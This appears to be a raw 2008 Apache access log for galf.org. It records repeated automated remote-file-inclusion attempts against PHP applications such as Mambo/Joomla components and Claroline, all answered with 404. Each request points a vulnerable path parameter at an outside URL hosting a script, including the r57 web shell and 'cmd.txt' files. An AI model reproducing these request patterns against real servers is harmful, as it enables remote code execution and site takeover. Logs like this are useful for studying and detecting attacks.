213.228.158.38 - - [24/Feb/2008:18:59:01 -0800] "GET /logs//index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.177.226.178 - - [24/Feb/2008:19:00:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.210.29.17 - - [24/Feb/2008:19:00:37 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.17 - - [24/Feb/2008:19:00:37 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.17 - - [24/Feb/2008:19:00:38 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.193.222.218 - - [24/Feb/2008:19:03:15 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.agf-fanclub.dk/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
213.193.222.218 - - [24/Feb/2008:19:03:22 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.agf-fanclub.dk/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "galf.org"
194.210.29.17 - - [24/Feb/2008:19:03:39 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.17 - - [24/Feb/2008:19:03:39 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.17 - - [24/Feb/2008:19:03:39 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.193.222.218 - - [24/Feb/2008:19:03:47 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.agf-fanclub.dk/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
213.193.222.218 - - [24/Feb/2008:19:03:48 -0800] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.agf-fanclub.dk/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
213.193.222.218 - - [24/Feb/2008:19:03:56 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.agf-fanclub.dk/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "galf.org"
163.191.85.7 - - [24/Feb/2008:19:05:45 -0800] "GET /logs/access_070709.log//agendax/addevent.inc.php?agendax_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.94.120.198 - - [24/Feb/2008:19:06:06 -0800] "GET /logs/access_080114.log/claroline/inc/claro_init_header.inc.php?includePath=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.120.198 - - [24/Feb/2008:19:06:06 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.120.198 - - [24/Feb/2008:19:06:06 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.228.158.38 - - [24/Feb/2008:19:06:48 -0800] "GET /logs/access.log//index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
213.228.158.38 - - [24/Feb/2008:19:06:49 -0800] "GET //index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
213.228.158.38 - - [24/Feb/2008:19:06:49 -0800] "GET /logs//index2.php?pagina=http://www.ciifen-int.org//modules/Forums/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
74.54.50.73 - - [24/Feb/2008:19:07:45 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:19:07:45 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:19:07:46 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt?? HTTP/1.1" 404 275 "-" "li